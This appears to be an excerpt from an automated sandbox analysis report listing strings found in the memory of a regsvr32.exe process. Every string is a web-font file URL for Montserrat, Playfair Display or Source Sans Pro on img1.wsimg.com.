Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414298449.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427445026.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427121426.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427017898.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459W1hyzbi.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427445026.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427121426.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427017898.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WRhyzbi.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414298449.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427445026.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427121426.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427017898.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F2B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459WZhyzbi.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414298449.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wdhyzbi.woff2)
Source: regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414298449.0000000002F2C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/montserrat/v26/JTUSjIg1_i6t8kCHKm459Wlhyw.woff2)
Source: regsvr32.exe, 00000003.00000002.2427394559.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_
Source: regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2)
Source: regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2)
Source: regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2)
Source: regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2
Source: regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/playfairdisplay/v37/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7jsDJT9g.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7ksDJT9g.woff2)
Source: regsvr32.exe, 00000003.00000003.2401673136.0000000002EA8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427084848.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.2427314775.0000000002E8A000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414329382.0000000002EAF000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401707553.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2378836890.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414381263.0000000002EBD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7nsDI.woff2
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7nsDI.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7osDJT9g.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7psDJT9g.woff2)
Source: regsvr32.exe, 00000003.00000003.2426984338.0000000002EFC000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7qsDJT9g.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2388369899.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EE1000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379159589.0000000005010000.00000004.00001000.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401659100.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414314633.0000000002EFB000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2401526988.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2379038172.0000000002EB0000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426944244.0000000002F34000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK1dSBYKcSV-LCoeQqfX1RYOo3qPZ7rsDJT9g.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qN67lqDY.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qNK7lqDY.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qNa7lqDY.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qNq7lqDY.woff2)
Source: regsvr32.exe, 00000003.00000003.2401498773.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2414270769.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426857781.0000000002F01000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427055593.0000000002F0F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2426998447.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.2427032561.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://img1.wsimg.com/gfonts/s/sourcesanspro/v22/6xK3dSBYKcSV-LCoeQqfX1RYOo3qO67lqDY.woff2)
